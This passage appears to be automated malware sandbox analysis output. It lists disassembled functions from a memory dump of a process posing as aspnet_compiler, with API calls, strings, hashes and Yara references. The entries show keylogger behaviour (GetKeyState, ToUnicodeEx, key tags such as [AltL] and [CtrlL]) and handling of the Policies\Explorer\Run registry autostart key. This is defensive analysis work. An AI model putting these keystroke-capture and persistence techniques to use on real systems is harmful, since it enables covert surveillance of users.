                                                            • Part of subcall function 00409B10: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                            • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,00000000,0040A91C,00000000), ref: 00409D84
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                                          • String ID: [AltL]$[AltR]
                                                          • API String ID: 2738857842-2658077756
                                                          • Opcode ID: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                          • Instruction ID: d2c0c429c9fe13b3c6c970781ecfc4970ab7400740a1dec538c1fc9fef0a0b20
                                                          • Opcode Fuzzy Hash: 2d4b77a5ab42310f07ca9c8b3da7c02f816ae55a84891d8b572aa7cd1e2c76fb
                                                          • Instruction Fuzzy Hash: 47E0652134072117C898323EA91E6EE3A228F82B65B80416FF8866BAD6DD6D4D5053CB
                                                          Function 00448803 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • _free.LIBCMT ref: 00448825
                                                            • Part of subcall function 00446AC5: HeapFree.KERNEL32(00000000,00000000,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?), ref: 00446ADB
                                                            • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorFreeHeapLast_free
                                                          • String ID: `@$`@
                                                          • API String ID: 1353095263-20545824
                                                          • Opcode ID: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction ID: 46705ffcfacdd7a720b29fb61e5cb4af2d59a6418439a2947ca99394172970e0
                                                          • Opcode Fuzzy Hash: 9a963da6b0d453c70d37714207bd95daf40472698ea915a46c6a843fe12f4396
                                                          • Instruction Fuzzy Hash: B9E06D761006059F8720DE6DD400A86B7E4EF95360320852AE89DE3310DB32E812CB40
                                                          Function 0040ADB0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyState.USER32(00000012), ref: 0040ADB5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: State
                                                          • String ID: [CtrlL]$[CtrlR]
                                                          • API String ID: 1649606143-2446555240
                                                          • Opcode ID: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                          • Instruction ID: 615b7dbe40c0b8188db9493e0f2b19f017fb36a74fa458c508a435569d7d4a1e
                                                          • Opcode Fuzzy Hash: b832f2ba8c23f1ed675ed1d8fb8a36e3adfa50d2a3dfff7a7859d4c0b25c7229
                                                          • Instruction Fuzzy Hash: 71E0862170071117C514353DD61A67F39228F41776F80013FF882ABAC6E96D8D6023CB
                                                          Function 0041297A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 23registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040C33C,00000000,?,00000000), ref: 00412988
                                                          • RegDeleteValueW.ADVAPI32(?,?,?,00000000), ref: 00412998
                                                          Strings
                                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00412986
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: DeleteOpenValue
                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                                          • API String ID: 2654517830-1051519024
                                                          • Opcode ID: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                          • Instruction ID: 4813e9247c8a4fa7715124fbb4df20ddc3d96ddce1d5e270e7c0f337b45b5704
                                                          • Opcode Fuzzy Hash: 37dabd9028f0cede140cc98497e4e15f557d68d096268be44a89a64eb946223e
                                                          • Instruction Fuzzy Hash: 0AE01270310304BFEF104F61ED06FDB37ACBB80B89F004165F505E5191E2B5DD54A658
                                                          Function 0043FA5E Relevance: 5.1, APIs: 4, Instructions: 139COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401AD8), ref: 0043FAF4
                                                          • GetLastError.KERNEL32 ref: 0043FB02
                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0043FB5D
                                                          Memory Dump Source
                                                          • Source File: 00000015.00000002.2871218568.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_21_2_400000_aspnet_compiler.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ByteCharMultiWide$ErrorLast
                                                          • String ID:
                                                          • API String ID: 1717984340-0
                                                          • Opcode ID: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                          • Instruction ID: ecac45699e256c48587d6f27f66036641a8fb520bb473c9b2adecd150689d728
                                                          • Opcode Fuzzy Hash: 3f0ff04a5dcf7e8fd5b137fcdb20dceab511bd439b95d46b3d550210e9ecb368
                                                          • Instruction Fuzzy Hash: 65414871E00206AFCF258F65C854ABBFBA4EF09310F1451BAF858973A1DB38AD09C759